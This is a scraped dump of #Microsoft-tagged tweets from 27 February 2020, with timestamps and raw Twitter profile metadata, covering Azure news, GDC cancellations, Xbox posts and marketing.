    <t>{'id': 90485974, 'id_str': '90485974', 'name': 'Anders Borum', 'screen_name': 'borumnet', 'location': 'Denmark', 'description': 'Passionate and experienced full stack senior software architect and developer on .NET / Azure technologies.', 'url': 'http://t.co/9IgW9bmGXP', 'entities': {'url': {'urls': [{'url': 'http://t.co/9IgW9bmGXP', 'expanded_url': 'http://www.sphereworks.dk', 'display_url': 'sphereworks.dk', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 164, 'friends_count': 94, 'listed_count': 33, 'created_at': 'Mon Nov 16 21:15:19 +0000 2009', 'favourites_count': 658, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1687,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'http://pbs.twimg.com/profile_images/575309476313485312/nXqahJEQ_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/575309476313485312/nXqahJEQ_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/90485974/1424269610',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</si>
  <si>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22:25:03 +0000 2020</t>
  </si>
  <si>
    <t>Noble goal to remove bias, but not easy. Do you think it is possible?
#AI #ArtificialIntelligence #MachineLearning #Microsoft #Satya
https://t.co/bjj6OXjqMk</t>
  </si>
  <si>
    <t>Thu Feb 27 22:24:57 +0000 2020</t>
  </si>
  <si>
    <t>Dont worry! #Microsoft is changing the default background image for #Microsoft365 &amp;amp; #azure login screens for performance reasons! #Office365 https://t.co/nL3dL5LihB</t>
  </si>
  <si>
    <t>{'id': 222442290, 'id_str': '222442290', 'name': 'Laurent Sittler', 'screen_name': 'laul0_68', 'location': 'ðŸ‡¨ðŸ‡¦', 'description': 'ðŸ‡«ðŸ‡· Microsoft 365 consultant/architect - working, learning and sharing about my interests. #SharePoint #Office365 #ModernWorkplace', 'url': 'https://t.co/0UK78bhz8m', 'entities': {'url': {'urls': [{'url': 'https://t.co/0UK78bhz8m', 'expanded_url': 'https://blog.lsonline.fr', 'display_url': 'blog.lsonline.fr', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 208, 'friends_count': 228, 'listed_count': 11, 'created_at': 'Fri Dec 03 12:44:41 +0000 2010', 'favourites_count': 273, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 402,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'http://pbs.twimg.com/profile_images/1034389299066822657/hwacEnAk_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1034389299066822657/hwacEnAk_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/222442290/1535453385', 'profile_link_color': '000000',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</si>
  <si>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Thu Feb 27 22:23:44 +0000 2020</t>
  </si>
  <si>
    <t>Last night I loaded up the Sega Genesis mini and relived my childhood by playing Sonic. Cant go wrong with some blue lighting. 
-
-
-
#sonicthehedgehog #rgblight #xbox #xbx1 #xboxseriesx #sonic #microsoft... https://t.co/BSVWRczeUF</t>
  </si>
  <si>
    <t>{'id': 1589214451, 'id_str': '1589214451', 'name': 'Playworthy', 'screen_name': 'Playworthy', 'location': 'Los Angeles, CA', 'description': 'ðŸŽ¥ YouTube - https://t.co/ixQnVtEDdn          ðŸ“¸ Instagram - https://t.co/z6dJYmwcX0', 'url': 'https://t.co/rz4iPVTojt', 'entities': {'url': {'urls': [{'url': 'https://t.co/rz4iPVTojt', 'expanded_url': 'http://playworthy.net', 'display_url': 'playworthy.net', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/ixQnVtEDdn', 'expanded_url': 'https://www.youtube.com/c/PlayWorthy', 'display_url': 'youtube.com/c/PlayWorthy', 'indices': [12, 35]}, {'url': 'https://t.co/z6dJYmwcX0', 'expanded_url': 'https://www.instagram.com/playworthy_', 'display_url': 'instagram.com/playworthy_', 'indices': [59, 82]}]}}, 'protected': False, 'followers_count': 629, 'friends_count': 1592, 'listed_count': 1, 'created_at': 'Fri Jul 12 19:09:58 +0000 2013', 'favourites_count': 329, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 931,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'http://pbs.twimg.com/profile_images/928766163022004224/0_WONMgj_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/928766163022004224/0_WONMgj_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1589214451/1558998635',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</si>
  <si>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22:23:03 +0000 2020</t>
  </si>
  <si>
    <t>Your friendly #Microsoft license compliance review can be an opportunity to find cost savings, prep your #cloud migration strategy, and make your relationship with Microsoft a bit friendlier. Here's how: https://t.co/RKduwFx4iT #Blog https://t.co/D5LcCwlgVn</t>
  </si>
  <si>
    <t>{'id': 348973111, 'id_str': '348973111', 'name': 'Aspera', 'screen_name': 'AsperaTech', 'location': 'Worldwide', 'description': 'At Aspera, we simplify the complexity of SAM. Our strategic solutions empower large companies to securely optimize their software licenses and save money.', 'url': 'http://t.co/npK88HIYLh', 'entities': {'url': {'urls': [{'url': 'http://t.co/npK88HIYLh', 'expanded_url': 'http://www.aspera.com', 'display_url': 'aspera.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 953, 'friends_count': 168, 'listed_count': 29, 'created_at': 'Fri Aug 05 09:35:12 +0000 2011', 'favourites_count': 170, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2334, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '003C60', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/699954693641007108/Dx-93pWT_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/699954693641007108/Dx-93pWT_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/348973111/1569606258', 'profile_link_color': '336699',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</si>
  <si>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22:20:22 +0000 2020</t>
  </si>
  <si>
    <t>GDC Loses Microsoft and Epic Games https://t.co/6PdvIBxo6A According to @Microsoft &amp;amp; @EpicGames both companies will be missing #GDC2020 due to the #coronavirus outbreak. What other companies do you expect to see cancel their #GDC20 trip? @Official_GDC #Epicgames #Microsoft https://t.co/gEWLsM8jxY</t>
  </si>
  <si>
    <t>{'id': 116583469, 'id_str': '116583469', 'name': 'COGconnected', 'screen_name': 'COGconnected', 'location': 'ðŸ‡¨ðŸ‡¦', 'description': 'Your top independent source for video game reviews, previews, news, videos, cosplay, features, podcast and more! All platforms and all games!', 'url': 'https://t.co/lHgR9kf2is', 'entities': {'url': {'urls': [{'url': 'https://t.co/lHgR9kf2is', 'expanded_url': 'http://www.cogconnected.com', 'display_url': 'cogconnected.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3876, 'friends_count': 1162, 'listed_count': 290, 'created_at': 'Tue Feb 23 00:24:18 +0000 2010', 'favourites_count': 2246, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 43670,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'http://pbs.twimg.com/profile_images/1176138725505417222/OP29rp4u_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1176138725505417222/OP29rp4u_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/116583469/1527730532', 'profile_link_color': '800000',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</si>
  <si>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22:15:22 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Outlook adds annotation feature for photos and scanned documents using your phone's camera.
#microsoft #third_party #email #apps #Android #webshoutz
technology solution to help your online business
https://t.co/gILWfuygfB https://t.co/CH9OzGC3oz</t>
  </si>
  <si>
    <t>Thu Feb 27 22:12:13 +0000 2020</t>
  </si>
  <si>
    <t>[Watch on-demand] Meet the New Yammer Webinar, February 2020 #Microsoft  https://t.co/XRKZVjRu2M</t>
  </si>
  <si>
    <t>Thu Feb 27 22:11:00 +0000 2020</t>
  </si>
  <si>
    <t>#MSPartners: how can you make #Microsoft love you more? https://t.co/N2aOW89dUx #TeamSync #ISVs https://t.co/hCKfkKG3Q6</t>
  </si>
  <si>
    <t>Thu Feb 27 22:10:20 +0000 2020</t>
  </si>
  <si>
    <t>LinkedIn is internally testing a Snapchat-like Stories feature #LinkedIn #MIcrosoft #Stories https://t.co/Mxtf0UHGUT https://t.co/MSFuOxtB2G</t>
  </si>
  <si>
    <t>Thu Feb 27 22:09:30 +0000 2020</t>
  </si>
  <si>
    <t>Snow storm wont stop me for some great shots. See the final shots this weekend. Any questions let me know in the comments
@Halo 
@GrimBrotherOne 
@misplacedyank 
@Tashi343i 
@NerdGallagher 
#halospotlight 
#snowday 
#BehindTheScenes 
#toyphotography 
#xbox #microsoft https://t.co/FgPBAVAR8x</t>
  </si>
  <si>
    <t>Thu Feb 27 22:08:49 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/vTjcqvl0bi
#ForSale from #ZCTC
#ZombieChewToyCollectibles
#Overlord 1 &amp;amp; 2 (#Microsoft #XBOX360) #Action #RPG #RolePlayingGame #BundleLot Set (of 2 #VideoGames). @ZCTCollectibles @Microsoft @Xbox @xboxuk @XboxSupport @Codemasters @WBHomeEnt @wbgames @WBGamesCanada</t>
  </si>
  <si>
    <t>{'id': 947231856214253568, 'id_str': '947231856214253568', 'name': 'Zombie Chew Toy Collectibles', 'screen_name': 'ZCTCollectibles', 'location': 'South Carolina, USA', 'description': '#ZCTC Sells COMIC BOOKS, VIDEO GAMES, SPORTS CARDS, MOVIES, MUSIC, BOOKS, CLOTHING, Horror / Sci-Fi / Fantasy Items &amp; Tons More Stuff !', 'url': 'https://t.co/napa93btvF', 'entities': {'url': {'urls': [{'url': 'https://t.co/napa93btvF', 'expanded_url': 'http://stores.ebay.com/zombiechewtoy', 'display_url': 'stores.ebay.com/zombiechewtoy', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 154, 'friends_count': 1841, 'listed_count': 2, 'created_at': 'Sat Dec 30 22:24:08 +0000 2017', 'favourites_count': 750, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 712,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'http://pbs.twimg.com/profile_images/1156353238179835904/zgfojoQ9_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1156353238179835904/zgfojoQ9_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/947231856214253568/1514703947',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</si>
  <si>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22:08:17 +0000 2020</t>
  </si>
  <si>
    <t>VNet Service EndPoint Policies are now GA! This is a great capability for those using VNet Service Endpoints for Storage #Azure #Microsoft #Networking https://t.co/SLdDqmWk1O</t>
  </si>
  <si>
    <t>{'id': 1376374861, 'id_str': '1376374861', 'name': 'Victor Arzate', 'screen_name': 'vmarzate', 'location': '', 'description': 'Senior Azure Customer Engineer at Microsoft.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 377, 'friends_count': 156, 'listed_count': 83, 'created_at': 'Wed Apr 24 06:45:55 +0000 2013', 'favourites_count': 206, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1891,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'http://pbs.twimg.com/profile_images/378800000766027199/dd219c12ad95e5452f0eab82dfe7fd9f_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000766027199/dd219c12ad95e5452f0eab82dfe7fd9f_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1376374861/1394571112',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</si>
  <si>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22:08:15 +0000 2020</t>
  </si>
  <si>
    <t>Pinterest adds DoorDash exec and Caviar Lead Gokul Rajaram to its board https://t.co/gOwlRfLpQc #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 22:08:14 +0000 2020</t>
  </si>
  <si>
    <t>Andreessen Horowitz has backed Run The World, a startup with a timely offering: live online events https://t.co/Qz7Hr8Hx9l #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 22:06:02 +0000 2020</t>
  </si>
  <si>
    <t>LinkedIn is internally testing a Snapchat-like Stories feature #LinkedIn #MIcrosoft #Stories https://t.co/8bsaRBNrpW https://t.co/hfDoBAhCYy</t>
  </si>
  <si>
    <t>Thu Feb 27 22:05:43 +0000 2020</t>
  </si>
  <si>
    <t>Your guide to taking screenshots, shutting down background apps and a useful battery-saving tip. https://t.co/Dh3MJXSF1J #Windows10 #Microsoft #Computers</t>
  </si>
  <si>
    <t>{'id': 510640177, 'id_str': '510640177', 'name': 'DC COMPUTERS INC', 'screen_name': 'dccomputers_ca', 'location': '62 Queen St. S. Bolton, On', 'description': 'We repair and sell new and used PC desktops and laptops.  We have the best prices on ink and toner in town.', 'url': 'http://t.co/zij04dLZvY', 'entities': {'url': {'urls': [{'url': 'http://t.co/zij04dLZvY', 'expanded_url': 'http://www.dccomputers.ca', 'display_url': 'dccomputers.ca', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 230, 'friends_count': 290, 'listed_count': 19, 'created_at': 'Thu Mar 01 18:24:28 +0000 2012', 'favourites_count': 7, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1133,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'http://pbs.twimg.com/profile_images/971142134718959616/zSYCGwaU_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/971142134718959616/zSYCGwaU_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/510640177/1535406991', 'profile_link_color': 'F47628', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'E27E4C', 'profile_text_color': 'D13202', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 22:05:29 +0000 2020</t>
  </si>
  <si>
    <t>What's Coming Up for #Azure #DevOps Boards, Repos, Pipelines and More -- #VisualStudio Magazine
#Microsoft #DevStyle #DevLife #csharp 
 https://t.co/1xYt1ByGHL</t>
  </si>
  <si>
    <t>Thu Feb 27 22:05:16 +0000 2020</t>
  </si>
  <si>
    <t>Azure DevOps Services to require TLS 1.2 https://t.co/sLyVCvSynH #Microsoft #Azure</t>
  </si>
  <si>
    <t>Thu Feb 27 22:05:15 +0000 2020</t>
  </si>
  <si>
    <t>GitHub Actions https://t.co/JHK5rXzMQs #Microsoft #Azure</t>
  </si>
  <si>
    <t>Thu Feb 27 22:05:09 +0000 2020</t>
  </si>
  <si>
    <t>#Windows 10 Always On #VPN and #DirectAccess #PowerShell scripts and sample files now available on GitHub. #Microsoft #Windows10 #Win10 #aovpn #mobility https://t.co/lrjZ9NcOZ3</t>
  </si>
  <si>
    <t>Thu Feb 27 22:02:36 +0000 2020</t>
  </si>
  <si>
    <t>88 percent of companies report that having a unified #DigitalWorkspace has saved them nearly $5 million over three years. Subscribe now to learn how you can save both time and money with #Microsoft. https://t.co/tWyEPythVy</t>
  </si>
  <si>
    <t>{'id': 2230283364, 'id_str': '2230283364', 'name': 'Lorien Balayan', 'screen_name': 'lorienkb', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 11, 'friends_count': 21, 'listed_count': 1, 'created_at': 'Wed Dec 04 17:51:47 +0000 2013', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1963,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'http://pbs.twimg.com/profile_images/378800000829392277/b9573dd5a42bed28e5b3470759017bc0_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000829392277/b9573dd5a42bed28e5b3470759017bc0_normal.jpeg',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</si>
  <si>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22:02:20 +0000 2020</t>
  </si>
  <si>
    <t>Learn how to turn raw business data into informed business decisions with #Dynamics365, #PowerBI, and other #Microsoft solutions. Subscribe today. https://t.co/6BSFGQcYt6</t>
  </si>
  <si>
    <t>Thu Feb 27 22:02:07 +0000 2020</t>
  </si>
  <si>
    <t>A modern data estate is not out of reach for your business. Moving to the cloud is easy, with no need to reconfigure your applications, and options like #HybridCloud can save you big dollars. #PCProfessional #Microsoft https://t.co/8Ix2Xc2qGo</t>
  </si>
  <si>
    <t>Thu Feb 27 22:00:02 +0000 2020</t>
  </si>
  <si>
    <t>This what the new Windows 10 menu may look like ! #Microsoft #Office365 #Windows10 https://t.co/iUI8fzJcXf</t>
  </si>
  <si>
    <t>{'id': 558823501, 'id_str': '558823501', 'name': 'BL IT Solutions', 'screen_name': 'BLITSolutions', 'location': 'Maidston, Kent', 'description': 'BL IT Solutions. South Eastâ€™s leading IT solutions company for small companies and domestic users across London and the South East of England.', 'url': 'https://t.co/l2Zdc9FJKN', 'entities': {'url': {'urls': [{'url': 'https://t.co/l2Zdc9FJKN', 'expanded_url': 'http://www.bl-it-solutions.co.uk', 'display_url': 'bl-it-solutions.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3855, 'friends_count': 4995, 'listed_count': 118, 'created_at': 'Fri Apr 20 17:51:25 +0000 2012', 'favourites_count': 4282, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 7934,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'http://pbs.twimg.com/profile_images/1226614122726526978/tUHex6An_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1226614122726526978/tUHex6An_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/558823501/1498506162',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</si>
  <si>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21:59:16 +0000 2020</t>
  </si>
  <si>
    <t>This what the new Windows 10 menu may look like ! #Microsoft #Windows10 #Office365</t>
  </si>
  <si>
    <t>Thu Feb 27 21:57:10 +0000 2020</t>
  </si>
  <si>
    <t>Glad to see the students from IPSA and SELSA volunteering and networking at the 2020 2nd Annual Tech Law Summit! "These students understand themselves to be social engineers." Prof. Lateef Mtima, IP Department at Howard Law. #microsoft #techlawsummit #howard #husl https://t.co/ZN7LDik8hY</t>
  </si>
  <si>
    <t>Thu Feb 27 21:56:40 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Office update for Android brings support for LG Dual Screen #Microsoft #MicrosoftOffice #Office #Microsoft #OfficeApp #Android https://t.co/3OWLiaU80R https://t.co/qcVlza2NxK</t>
  </si>
  <si>
    <t>Thu Feb 27 21:56:36 +0000 2020</t>
  </si>
  <si>
    <t>This week alone, #Apple lost $173B, #Microsoft lost $155B, #Google lost $115B, #Amazon lost $105B, #Facebook lost $58B and #Disney $38B.
#minicrash #CoronaVirusUpdates</t>
  </si>
  <si>
    <t>{'id': 33996857, 'id_str': '33996857', 'name': 'Omar Tazi', 'screen_name': 'otazi', 'location': 'Cologne, Germany', 'description': "Entrepreneur &amp; digital executive with magenta blood. Responsible for products, innovation &amp; alliances for DT Group. Opinions Expressed here are my own not DT's.", 'url': 'https://t.co/5Sw6l4g0wA', 'entities': {'url': {'urls': [{'url': 'https://t.co/5Sw6l4g0wA', 'expanded_url': 'http://www.linkedin.com/in/otazi', 'display_url': 'linkedin.com/in/otazi', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 928, 'friends_count': 151, 'listed_count': 23, 'created_at': 'Tue Apr 21 18:47:06 +0000 2009', 'favourites_count': 3786, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1866,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'http://pbs.twimg.com/profile_images/1002528270229917696/dnIhyIWm_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1002528270229917696/dnIhyIWm_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/33996857/1412274441', 'profile_link_color': 'EA0A8E',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</si>
  <si>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21:56:33 +0000 2020</t>
  </si>
  <si>
    <t>Azure HBv2 Virtual Machines eclipse 80,000 cores for MPI HPC #Microsoft #Azure https://t.co/JfdpHbOvhH</t>
  </si>
  <si>
    <t>Thu Feb 27 21:55:34 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "Windows 10 2004 Is Coming, Released to Enterprise for Testing:" https://t.co/SDDNJ5A4RX
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Thu Feb 27 21:54:27 +0000 2020</t>
  </si>
  <si>
    <t>ExpressRoute Global Reach: Building your own cloud-based global backbone #Microsoft #Azure https://t.co/NAmJ2Zq3YB</t>
  </si>
  <si>
    <t>Thu Feb 27 21:53:32 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft announced today that it will not have a presence at the Game Developers Conference in San Francisco this year, highlighting concerns surrounding the coronavirus outbreak.</t>
  </si>
  <si>
    <t>{'id': 1081589725100761088, 'id_str': '1081589725100761088', 'name': 'Unboxmuse - Patrick Hagot', 'screen_name': 'unboxmuse', 'location': 'California, USA', 'description': 'Watch my latest Unboxing with my Twin.\n\nhttps://t.co/7Kk008eZ8B\n\n#techcatches (find the best tech deals online in one place)\nhttps://t.co/EyS5vXKn2Q', 'url': 'https://t.co/7mxcHXqLyi', 'entities': {'url': {'urls': [{'url': 'https://t.co/7mxcHXqLyi', 'expanded_url': 'http://www.techcatches.com', 'display_url': 'techcatches.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/7Kk008eZ8B', 'expanded_url': 'http://Youtube.com/unboxmuse', 'display_url': 'Youtube.com/unboxmuse', 'indices': [40, 63]}, {'url': 'https://t.co/EyS5vXKn2Q', 'expanded_url': 'http://techcatches.com', 'display_url': 'techcatches.com', 'indices': [125, 148]}]}}, 'protected': False, 'followers_count': 31, 'friends_count': 86, 'listed_count': 0, 'created_at': 'Sat Jan 05 16:34:20 +0000 2019', 'favourites_count': 558, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 668, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1179877801438175232/676ixfgs_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1179877801438175232/676ixfgs_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1081589725100761088/1569243384',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</si>
  <si>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21:46:00 +0000 2020</t>
  </si>
  <si>
    <t>#ICYMI Accelerate Your cloud strategy with Skytap on Azure https://t.co/5MCLCUhOub #Azure #Cloud #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 21:45:21 +0000 2020</t>
  </si>
  <si>
    <t>That just leaves playstation without a decent refund policy. #PlayStation #microsoft #xbox #Nintendo #Steam #gog #pc https://t.co/Q4X6VPgMZI</t>
  </si>
  <si>
    <t>{'id': 24831941, 'id_str': '24831941', 'name': 'Sean Koppie', 'screen_name': 'A42YearOldArab', 'location': 'Orlando, FL', 'description': 'Snapchat, Xbox, psn, instagram @a42yearoldarab #collegelife', 'url': 'https://t.co/tIaVeGnwPA', 'entities': {'url': {'urls': [{'url': 'https://t.co/tIaVeGnwPA', 'expanded_url': 'http://Instagram.com/a42yearoldarab', 'display_url': 'Instagram.com/a42yearoldarab', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 106, 'friends_count': 236, 'listed_count': 2, 'created_at': 'Tue Mar 17 03:27:22 +0000 2009', 'favourites_count': 2907, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5937,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'http://pbs.twimg.com/profile_images/558150997865168897/yyMAwvZk_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/558150997865168897/yyMAwvZk_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/24831941/1449920972', 'profile_link_color': 'DD2E44',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</si>
  <si>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Feb 27 21:45:08 +0000 2020</t>
  </si>
  <si>
    <t>.@Forbes:  #PaulAllens #SiliconValley #Home Sells For $35.3M   @KK_Howley
https://t.co/rs3vkSnbyA  #Microsoft #tech #estate #CA #realestate</t>
  </si>
  <si>
    <t>Thu Feb 27 21:45:05 +0000 2020</t>
  </si>
  <si>
    <t>Also #Microsoft &amp;amp; #Epicgames cancel #GDC2020. Seems we are the biggest exhibitor now. Just kidding. Dire situation actually. Everyone stay healthy and safe!</t>
  </si>
  <si>
    <t>{'id': 17018341, 'id_str': '17018341', 'name': 'Penultimo', 'screen_name': 'Bernd_B', 'location': 'Hessen/Germany', 'description': "Gamer, father of three, husband, Global PR-boy for El Presidente and still mother's finest", 'url': 'https://t.co/3Z38HO36G4', 'entities': {'url': {'urls': [{'url': 'https://t.co/3Z38HO36G4', 'expanded_url': 'http://www.kalypsomedia.com', 'display_url': 'kalypsomedia.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 605, 'friends_count': 976, 'listed_count': 22, 'created_at': 'Tue Oct 28 09:42:28 +0000 2008', 'favourites_count': 5781, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4868,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'http://pbs.twimg.com/profile_images/962730531334082562/s4668TzW_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/962730531334082562/s4668TzW_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/17018341/1535615428',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</si>
  <si>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Feb 27 21:44:12 +0000 2020</t>
  </si>
  <si>
    <t>Glad to be a part of the 2nd Annual Miscrosoft Tech Summit here at Howard Law! Collaboration between  technology, law, and social engineering is a must for the future. 
#Microsoft #techsummit #howardlaw #husl #IPSA #socialengineering</t>
  </si>
  <si>
    <t>Thu Feb 27 21:44:00 +0000 2020</t>
  </si>
  <si>
    <t>Another #Onederful @wakelet!  I had to have one for #OneNote 
https://t.co/EPKsaN8Wos
#Microsoft365
#MicrosoftEDU 
#microsofteduk 
#Microsoft
#accessibility 
#UDL</t>
  </si>
  <si>
    <t>Thu Feb 27 21:43:36 +0000 2020</t>
  </si>
  <si>
    <t>The latest The System software Daily! https://t.co/vTz4G7KATV Thanks to @kbmuellerdo @AVisionQuest @bradyje03 #microsoft #linux</t>
  </si>
  <si>
    <t>Thu Feb 27 21:42:46 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft announces official release of Babylon.js 4.1 #Babylonjs 
See: https://t.co/yLMrIUFXw8</t>
  </si>
  <si>
    <t>Thu Feb 27 21:40:44 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "As Coronavirus Spreads, So Does Covid-19 Themed Malware:" https://t.co/HQj0ry06id
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Thu Feb 27 21:40:36 +0000 2020</t>
  </si>
  <si>
    <t>By 2030, global demand for water will surpass supply by 40%. That's why @Ecolab uses #Microsoft #Azure and #PowerBI to help customers produce better with much less water. https://t.co/WP0lhJuK7U</t>
  </si>
  <si>
    <t>{'id': 769165507, 'id_str': '769165507', 'name': 'Ajay Nabh', 'screen_name': 'AjayNabh1', 'location': 'New Zealand', 'description': 'Senior Cloud Consultant at Umbrellar.  Technologist, Altruist, Thinker and Dreamer. Tweets are mine.', 'url': 'https://t.co/kt2KTRlDBm', 'entities': {'url': {'urls': [{'url': 'https://t.co/kt2KTRlDBm', 'expanded_url': 'http://www.umbrellar.com', 'display_url': 'umbrellar.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 252, 'friends_count': 282, 'listed_count': 6, 'created_at': 'Mon Aug 20 09:09:27 +0000 2012', 'favourites_count': 2118, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2948, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'C0DEED', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/943255899971321857/sOUXooAz_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/943255899971321857/sOUXooAz_normal.jpg',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</si>
  <si>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Feb 27 21:39:36 +0000 2020</t>
  </si>
  <si>
    <t>#Windows7eol means your computer is far more susceptible to #cybercrime as #Microsoft is no longer updating the software, including security patches.
For businesses, the dangers of staying on #Windows7 far outweigh the costs of moving to #Windows10. https://t.co/Tj3auEsZSu</t>
  </si>
  <si>
    <t>{'id': 1220745472291135488, 'id_str': '1220745472291135488', 'name': 'KLH IT Services', 'screen_name': 'KLH_IT', 'location': 'Minnetonka, MN', 'description': 'IT Done Right.\n\nServing the Greater Twin Cities area.\n\nCheck out our LinkedIn page @ https://t.co/IylS5HsbTD', 'url': 'https://t.co/euDOG6a9AN', 'entities': {'url': {'urls': [{'url': 'https://t.co/euDOG6a9AN', 'expanded_url': 'http://klhmn.com', 'display_url': 'klhmn.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/IylS5HsbTD', 'expanded_url': 'http://linkedin.com/company/klhmn', 'display_url': 'linkedin.com/company/klhmn', 'indices': [85, 108]}]}}, 'protected': False, 'followers_count': 1, 'friends_count': 15, 'listed_count': 0, 'created_at': 'Fri Jan 24 16:29:47 +0000 2020', 'favourites_count': 78,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'http://pbs.twimg.com/profile_images/1229488208389394433/Oy9YXODZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1229488208389394433/Oy9YXODZ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1220745472291135488/1581967350',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</si>
  <si>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21:36:41 +0000 2020</t>
  </si>
  <si>
    <t>We deliver all the Benefits of Office 365 for Business
